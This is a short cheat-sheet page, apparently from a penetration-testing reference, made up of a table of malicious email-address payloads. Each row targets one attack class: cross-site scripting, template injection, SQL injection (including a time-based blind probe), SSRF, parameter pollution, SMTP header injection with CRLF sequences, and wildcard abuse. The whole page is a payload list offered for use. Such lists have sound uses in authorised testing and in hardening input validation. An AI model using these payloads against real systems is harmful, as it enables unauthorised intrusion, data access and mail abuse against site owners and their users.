Email attacks
Email attacks
Attack | Payload |
---|---|
XSS | test+(alert(0))@example.com test@example(alert(0)).com "alert(0)"@example.com <script src=//xsshere?”@email.com |
Template injection | "<%= 7 * 7 %>"@example.com test+(${{7*7}})@example.com |
SQLi | "' OR 1=1 -- '"@example.com "mail'); SELECT version();--"@example.com a'-IF(LENGTH(database())=9,SLEEP(7),0)or'1'='1"@a.com |
SSRF | john.doe@[127.0.0.1] |
Parameter Pollution | victim&[email protected] |
(Email) Header Injection | "%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com "[email protected]>\r\nRCPT TO:<victim+"@test.com |
Wildcard abuse | %@example.com |
Last updated